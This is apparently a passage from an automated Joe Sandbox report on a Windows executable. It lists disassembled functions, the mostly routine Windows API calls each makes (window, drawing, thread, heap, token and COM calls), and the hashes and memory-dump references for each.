                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessagePostSleep$RectWindow
                                        • String ID:
                                        • API String ID: 3382505437-0
                                        • Opcode ID: 9bc3f84295a2643a8b44e398d87f912b772797fc34e9e7ea71048d7d5d4a548b
                                        • Instruction ID: 6163e2dcad61ed9b693bc1fbdc7f9e91d1beea528fa0168d75e04e5295c40a96
                                        • Opcode Fuzzy Hash: 9bc3f84295a2643a8b44e398d87f912b772797fc34e9e7ea71048d7d5d4a548b
                                        • Instruction Fuzzy Hash: 8831BFB160021DEBDB15CFA8DD4DAAE3BB6EB45315F104215F920EA1D1C7B89D14CB90
                                        Function 007AE9B5 Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindowVisible.USER32(?), ref: 007AE9CD
                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 007AE9EA
                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 007AEA22
                                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 007AEA48
                                        • _wcsstr.LIBCMT ref: 007AEA52
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                        • String ID:
                                        • API String ID: 3902887630-0
                                        • Opcode ID: 83fdb36aaf91cd810f3fe72d3c95becf250554b4fc61fae8bd2dce7f59b0bd19
                                        • Instruction ID: 33fb2ccaeb89cb743c2bd8f2607410f2b83dfaf5b77f28f88d805072c84ed8d4
                                        • Opcode Fuzzy Hash: 83fdb36aaf91cd810f3fe72d3c95becf250554b4fc61fae8bd2dce7f59b0bd19
                                        • Instruction Fuzzy Hash: 6321F972204204BEEB259B69EC49E7F7BADEF86750F10C139F809CA191DA79DC409690
                                        Function 007DDC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                        • GetWindowLongW.USER32(?,000000F0), ref: 007DDCC0
                                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 007DDCE4
                                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007DDCFC
                                        • GetSystemMetrics.USER32(00000004), ref: 007DDD24
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,007C407D,00000000), ref: 007DDD42
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$Long$MetricsSystem
                                        • String ID:
                                        • API String ID: 2294984445-0
                                        • Opcode ID: 5f409b1ec3268657a25d8fabcaa0c96f048322d4fc7c096efc0e48232798b7d2
                                        • Instruction ID: a19ba3ba2afb50222dd39a25a5ae3dc5c732f0ddad3c853b1b9ce3a94f144cc8
                                        • Opcode Fuzzy Hash: 5f409b1ec3268657a25d8fabcaa0c96f048322d4fc7c096efc0e48232798b7d2
                                        • Instruction Fuzzy Hash: B821AC71614212AFCF305F798C48B6A37A6FB45765F104B36F926D62E0E7789C10CB90
                                        Function 007ACA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007ACA86
                                          • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007ACAB8
                                        • __itow.LIBCMT ref: 007ACAD0
                                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007ACAF6
                                        • __itow.LIBCMT ref: 007ACB07
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$__itow$_memmove
                                        • String ID:
                                        • API String ID: 2983881199-0
                                        • Opcode ID: 0fc772724dce12299e41b537a2e48e2f3aebf369f90305db365dc675a026fcad
                                        • Instruction ID: ce989d2a8a5db4467230ca985c7dc743625fb26e1029834f8caf63746d3a725a
                                        • Opcode Fuzzy Hash: 0fc772724dce12299e41b537a2e48e2f3aebf369f90305db365dc675a026fcad
                                        • Instruction Fuzzy Hash: 7C210176700214FBDF25EAA49C4BEDE7B69DF8A750F008124F905E7281D6798D05C7A0
                                        Function 007C89AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindow.USER32(00000000), ref: 007C89CE
                                        • GetForegroundWindow.USER32 ref: 007C89E5
                                        • GetDC.USER32(00000000), ref: 007C8A21
                                        • GetPixel.GDI32(00000000,?,00000003), ref: 007C8A2D
                                        • ReleaseDC.USER32(00000000,00000003), ref: 007C8A68
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$ForegroundPixelRelease
                                        • String ID:
                                        • API String ID: 4156661090-0
                                        • Opcode ID: 62f7b6cbe8507863965523f1fd4a7706a461ac7c90b28d21aa0592fa5c5ea942
                                        • Instruction ID: 9ad1c991b4565d8f28d69a470008d629475ea2a13a383dbbf5eeb5115c30d15f
                                        • Opcode Fuzzy Hash: 62f7b6cbe8507863965523f1fd4a7706a461ac7c90b28d21aa0592fa5c5ea942
                                        • Instruction Fuzzy Hash: 8E216F75A00204AFDB10EF65C889BAA7BF5EF48341F04C47DE94AD7351DA78AD00CB61
                                        Function 0078B58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0078B5EB
                                        • SelectObject.GDI32(?,00000000), ref: 0078B5FA
                                        • BeginPath.GDI32(?), ref: 0078B611
                                        • SelectObject.GDI32(?,00000000), ref: 0078B63B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ObjectSelect$BeginCreatePath
                                        • String ID:
                                        • API String ID: 3225163088-0
                                        • Opcode ID: 500e9d0196c60f4f919f8df819c23d8fcf414602a334d3324c4743437dd80f06
                                        • Instruction ID: 54de4f68c53d5b43fce72a9b4ea3f6c3ee8e3a9afdc6f1858d63f24ed367c86f
                                        • Opcode Fuzzy Hash: 500e9d0196c60f4f919f8df819c23d8fcf414602a334d3324c4743437dd80f06
                                        • Instruction Fuzzy Hash: 5521AE70900348EFDF20AF15EC4C7AABBE9FB80B25F14452AF411921B0D3B898A1CB58
                                        Function 00792E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __calloc_crt.LIBCMT ref: 00792E81
                                        • CreateThread.KERNEL32(?,?,00792FB7,00000000,?,?), ref: 00792EC5
                                        • GetLastError.KERNEL32 ref: 00792ECF
                                        • _free.LIBCMT ref: 00792ED8
                                        • __dosmaperr.LIBCMT ref: 00792EE3
                                          • Part of subcall function 0079889E: __getptd_noexit.LIBCMT ref: 0079889E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                        • String ID:
                                        • API String ID: 2664167353-0
                                        • Opcode ID: 958a12ae5bb57571e12e501d647b5d70cffd78b7f21bbae45e266de15b223f90
                                        • Instruction ID: 81dd59932463967ec490789ddff58f7928fe3951b2b72fcc678a7fd8660f0722
                                        • Opcode Fuzzy Hash: 958a12ae5bb57571e12e501d647b5d70cffd78b7f21bbae45e266de15b223f90
                                        • Instruction Fuzzy Hash: 5B11A532104705FF9F20BFA5BC89D6B7BA9EF45760B100529F91886152DB39D80287A5
                                        Function 007AB8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 007AB903
                                        • GetLastError.KERNEL32(?,007AB3CB,?,?,?), ref: 007AB90D
                                        • GetProcessHeap.KERNEL32(00000008,?,?,007AB3CB,?,?,?), ref: 007AB91C
                                        • RtlAllocateHeap.NTDLL(00000000,?,007AB3CB), ref: 007AB923
                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 007AB93A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                        • String ID:
                                        • API String ID: 883493501-0
                                        • Opcode ID: 2cb44568c64a8e5ecfa4bcea1551dd98504120eecf6de223c04fac529bbdfcc2
                                        • Instruction ID: 8d8cacc8e13f2bb80b7a3ba83a147a6defe7579c24d3f9217e7b7443c76ac1dc
                                        • Opcode Fuzzy Hash: 2cb44568c64a8e5ecfa4bcea1551dd98504120eecf6de223c04fac529bbdfcc2
                                        • Instruction Fuzzy Hash: 9C016971201208FFDB214FA5DC88D7B3BAEEF8A7A4B104029FA45C2261DB799C40DA60
                                        Function 007B8355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007B8371
                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 007B837F
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 007B8387
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 007B8391
                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007B83CD
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                        • String ID:
                                        • API String ID: 2833360925-0
                                        • Opcode ID: c027fccdc55518475cc60b84f2689419869fda5206f62a76c347339af418da76
                                        • Instruction ID: 648df3282b8afe1334a0c0b39826c7a3da47bf5b5074775c43f594bd4499fed6
                                        • Opcode Fuzzy Hash: c027fccdc55518475cc60b84f2689419869fda5206f62a76c347339af418da76
                                        • Instruction Fuzzy Hash: 74012931D0461DDBCF10AFA4ED49AEEBBB9FB08B11F014055E541B3150DF789950CBA6
                                        Function 007AA857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CLSIDFromProgID.COMBASE ref: 007AA874
                                        • ProgIDFromCLSID.COMBASE(?,00000000), ref: 007AA88F
                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 007AA89D
                                        • CoTaskMemFree.COMBASE(00000000), ref: 007AA8AD
                                        • CLSIDFromString.COMBASE(?,?), ref: 007AA8B9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                        • String ID:
                                        • API String ID: 3897988419-0
                                        • Opcode ID: ea019192840df026501f9bee80f76846e39a59ee94280e54af0edd88d470ae7d
                                        • Instruction ID: 906479f8e3d98ea8e310bc519c0649711dbe6bfb542f009ba2bc3c0399f8c89d
                                        • Opcode Fuzzy Hash: ea019192840df026501f9bee80f76846e39a59ee94280e54af0edd88d470ae7d
                                        • Instruction Fuzzy Hash: D1014F76600214BFDB225F54DC44BAA7BEEEF857A1F148124B901D2210D77CDD41DBA1
                                        Function 007AB7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007AB806
                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007AB810
                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007AB81F
                                        • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 007AB826
                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007AB83C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                        • String ID:
                                        • API String ID: 47921759-0
                                        • Opcode ID: 452db17a0ed035e99ceb2fba85a77d9e004c0c65477e4e4c55436d14c8e3f6bb
                                        • Instruction ID: 541851035544d25e528ea0a6ed90d549f7356258ec4ccc8502db1ac5de70adfe
                                        • Opcode Fuzzy Hash: 452db17a0ed035e99ceb2fba85a77d9e004c0c65477e4e4c55436d14c8e3f6bb
                                        • Instruction Fuzzy Hash: EDF06275200304AFEB211FA9EC88E7B3B6DFF86754F008129F941C7151CB689C41DBA4
                                        Function 007AB78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007AB7A5
                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007AB7AF
                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007AB7BE
                                        • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 007AB7C5
                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007AB7DB
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                        • String ID:
                                        • API String ID: 47921759-0
                                        • Opcode ID: db8c64f2b9cf9a3dfd143cb209b7825802c5eccae9add73057c0b8aede7b1846
                                        • Instruction ID: 5565c374d6f0799917516366d219ffc491a6a97998505e315524a3e1a03e6a05
                                        • Opcode Fuzzy Hash: db8c64f2b9cf9a3dfd143cb209b7825802c5eccae9add73057c0b8aede7b1846
                                        • Instruction Fuzzy Hash: 29F04F71240208AFEB201FE5AC89E7B3BAEFF86755F10811AFA41C7151DBB89C41DA64
                                        Function 007AFA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 007AFA8F
                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 007AFAA6
                                        • MessageBeep.USER32(00000000), ref: 007AFABE
                                        • KillTimer.USER32(?,0000040A), ref: 007AFADA
                                        • EndDialog.USER32(?,00000001), ref: 007AFAF4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                        • String ID:
                                        • API String ID: 3741023627-0
                                        • Opcode ID: 68b9e471dac83bd0ebddf86a423a7b042148933f7235e33a751fae2aad2f5126
                                        • Instruction ID: b1b23abe2eae952f6ecab1d8af755ef0e96f6d2ba5efc66c1108fab2bbf2611b
                                        • Opcode Fuzzy Hash: 68b9e471dac83bd0ebddf86a423a7b042148933f7235e33a751fae2aad2f5126
                                        • Instruction Fuzzy Hash: 7301D630500304ABEB309B50DD4EBE677B9BB01705F048269F15BA50E0DBF8AD54CB44
                                        Function 0078B517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • EndPath.GDI32(?), ref: 0078B526
                                        • StrokeAndFillPath.GDI32(?,?,007EF583,00000000,?), ref: 0078B542
                                        • SelectObject.GDI32(?,00000000), ref: 0078B555
                                        • DeleteObject.GDI32 ref: 0078B568
                                        • StrokePath.GDI32(?), ref: 0078B583
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                        • String ID:
                                        • API String ID: 2625713937-0
                                        • Opcode ID: 788393b4ca63dc194dc5f1dcb4e91ef0a420fdf0e0da0c7a8b73509b5d11a812
                                        • Instruction ID: 6f823178199d633382a4e4c3f3ed86812577bf14487bc52b82801b74a9a06d55
                                        • Opcode Fuzzy Hash: 788393b4ca63dc194dc5f1dcb4e91ef0a420fdf0e0da0c7a8b73509b5d11a812
                                        • Instruction Fuzzy Hash: CEF0F930044208EBDF256F25ED0CB697FE6FB41B22F188624F4A9445F0CB3889A6DF18
                                        Function 007BFA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CoInitialize.OLE32(00000000), ref: 007BFAB2
                                        • CoCreateInstance.COMBASE(007FDA7C,00000000,00000001,007FD8EC,?), ref: 007BFACA
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • CoUninitialize.COMBASE ref: 007BFD2D
                                        Strings
                                        Memory Dump Source
